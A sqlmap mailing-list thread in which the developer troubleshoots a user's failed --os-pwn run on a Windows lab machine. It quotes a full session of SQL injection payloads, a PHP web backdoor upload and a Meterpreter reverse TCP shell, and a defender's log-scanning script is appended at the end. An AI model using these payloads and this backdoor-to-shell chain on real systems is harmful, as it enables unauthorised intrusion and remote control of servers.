Re: [sqlmap-users] mysql os-pwn options on windows
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
In your case, the problem is the --tmp-path. Have you manually set it to "/tmp"? If so, it is wrongly set to a Linux path, while you should put it to a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of temporary files directory)

Bye

On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <mir...@gm...> wrote:

> $ sudo python sqlmap.py -u "
> http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
> [sudo] password for stamparm:
>          _
>  ___ ___| |_____ ___ ___  {1.0.4.21#dev}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:11:45
>
> [09:11:45] [WARNING] you did not provide the local path where Metasploit
> Framework is installed
> [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
> installation inside the environment path(s)
> [09:11:45] [INFO] Metasploit Framework has been found installed in the
> '/usr/bin' path
> [09:11:45] [INFO] resuming back-end DBMS 'mysql'
> [09:11:45] [INFO] testing connection to the target URL
> [09:11:45] [INFO] heuristics detected web page charset 'ascii'
> [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=1 AND 2546=2546
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
> BY clause
>     Payload: id=1 AND (SELECT 8079 FROM(SELECT
> COUNT(*),CONCAT(0x7178767071,(SELECT
> (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
>     Type: AND/OR time-based blind
>     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
>     Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 3 columns
>     Payload: id=1 UNION ALL SELECT
> NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
> epjZ
> ---
> [09:11:45] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [09:11:45] [INFO] fingerprinting the back-end DBMS operating system
> [09:11:45] [INFO] the back-end DBMS operating system is Windows
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> >
> [09:11:46] [INFO] going to use a web backdoor to establish the tunnel
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> >
> [09:11:47] [WARNING] unable to retrieve automatically the web server
> document root
> what do you want to use for writable directory?
> [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
> [2] custom location(s)
> [3] custom directory list file
> [4] brute force search
> > 1
> [09:12:02] [WARNING] unable to automatically parse any web server path
> [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
> LIMIT 'LINES TERMINATED BY' method
> [09:12:02] [INFO] the file stager has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
> [09:12:02] [INFO] the backdoor has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
> [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports between the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> >
> what is the local address? [Enter for '192.168.146.1' (detected)]
> which local port number do you want to use? [59643]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> >
> [09:12:04] [INFO] creation in progress ..... done
> [09:12:09] [INFO] uploading shellcodeexec to
> 'C:/Windows/Temp/tmpsehply.exe'
> [09:12:09] [INFO] shellcodeexec successfully uploaded
> [09:12:09] [INFO] running Metasploit Framework command line interface
> locally, please wait..
>
> [Metasploit Framework ASCII-art banner: "METASPLOIT CYBER MISSILE COMMAND V4", http://metasploit.pro]
>
>        =[ metasploit v4.11.8-dev-a030179 ]
> + -- --=[ 1527 exploits - 880 auxiliary - 259 post ]
> + -- --=[ 437 payloads - 38 encoders - 8 nops ]
> + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
>
> PAYLOAD => windows/meterpreter/reverse_tcp
> EXITFUNC => process
> LPORT => 59643
> LHOST => 192.168.146.1
> [*] Started reverse TCP handler on 192.168.146.1:59643
> [*] Starting the payload handler...
> [09:12:18] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [09:12:23] [WARNING] turning off pre-connect mechanism because of
> connection time out(s)
> [*] Sending stage (957487 bytes) to 192.168.146.132
>
> meterpreter >
>
>
> On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
> wrote:
>
>> Hi all,
>>
>> I'm just wondering, when I tried to do --os-pwn on sqlmap in my "DVWA
>> windows machine"
>>
>> I got an error
>>
>> [WARNING] unable to upload the file through the web file stager to '/tmp'
>>
>> I wonder, is it only available for Linux OS?
>>
>> thanks
>> Indra Z
>>
>> --
>> --from the net with zero space--
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

--
Miroslav Stampar
http://about.me/stamparm
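
A defender-side view of the quoted session, as an added example that is not part of the original thread or of sqlmap: the stager upload through the 'LINES TERMINATED BY' method and the follow-up request to the uploaded file both pass through the web server, so they can be looked for in its access log. The log format (Apache common/combined), the stager name pattern (generalised from the two file names in the quoted output) and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log line: client, timestamp, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# SQL file-write clause arriving inside a request parameter.
FILE_WRITE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\b", re.I)
# Assumption: stager names follow the two seen in the thread
# (tmpuycdj.php, tmpbqtzu.php): "tmp" + 5 lowercase letters + ".php".
STAGER_RE = re.compile(r"/tmp[a-z]{5}\.php$")


def scan(lines):
    """Return alerts as (client, kind, path) tuples in log order."""
    alerts, writers = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        client, _ts, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if FILE_WRITE_RE.search(unquote_plus(query)):
            writers.add(client)
            alerts.append((client, "sql-file-write", path))
        elif STAGER_RE.search(path) and status == "200":
            # A hit from a client that just attempted a file write is the
            # strong signal; the name alone is only a weak one.
            kind = "stager-after-file-write" if client in writers else "stager-like-name"
            alerts.append((client, kind, path))
    return alerts


# Constructed sample lines (documentation addresses, placeholder file content).
SAMPLE = [
    '203.0.113.7 - - [22/Apr/2016:09:12:02 +0200] "GET /test_environment/mysql/'
    'get_int.php?id=1%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2Fxampp%2Fhtdocs'
    '%2Ftmpaaaaa.php%27%20LINES%20TERMINATED%20BY%200x41 HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Apr/2016:09:12:02 +0200] "GET /tmpaaaaa.php HTTP/1.1" 200 321',
    '198.51.100.9 - - [22/Apr/2016:09:13:10 +0200] "GET /tmpzzzzz.php HTTP/1.1" 404 209',
    '198.51.100.9 - - [22/Apr/2016:09:13:11 +0200] "GET /test_environment/mysql/'
    'get_int.php?id=1 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Access logs record only the request line, so a file-write clause sent in a POST body is not visible to this check and needs the database query log or a WAF instead.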